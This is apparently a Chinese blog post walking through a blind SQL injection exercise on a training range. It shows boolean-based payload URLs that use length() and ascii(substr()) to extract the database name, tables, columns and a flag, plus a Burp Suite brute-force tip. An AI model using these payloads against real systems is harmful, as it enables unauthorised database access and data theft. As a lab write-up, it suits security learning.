掌控安全less6 靶场简易--盲注

1.判断是否存在sql注入

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1"  and "1"="1

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and "1"="2

页面返回不一致,初步判断存在注入

2.查询数据库长度即名称

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and length(database())>=12--+

长度为12

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and ascii(substr(database(),1,1))>=1--+

后使用burpsuite爆破,但注意爆破是>=应改为=

为kanwolongxia

3.查询表长以及名称

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and length((select table_name from information_schema.tables where table_schema='kanwolongxia' limit 0,1))>=1--+

为6

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='kanwolongxia'  limit 0,1),1,1))>=1--+

为loflag

同理可查第二张表与第三张表

4.查询列长以及列名

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1"and length((select column_name from information_schema.columns where table_name='loflag' limit 0,1))>=1--+

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1"and ascii(substr((select column_name from information_schema.columns where table_name="loflag" limit 0,1),1,1))>=1--+

第一个列查出为id

第二个列查出为flaglo

5.查询flag值

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and length((select flaglo from loflag limit 2,1))>=7--+

http://injectx1.lab.aqlab.cn:81/Pass-11/index.php?id=1" and ascii(substr((select flaglo from loflag limit 2,1),1,1))>=1--+

flag为zKaQ-RD

posted @ 2020-09-04 18:13  LY2333  阅读(501)  评论(0编辑  收藏  举报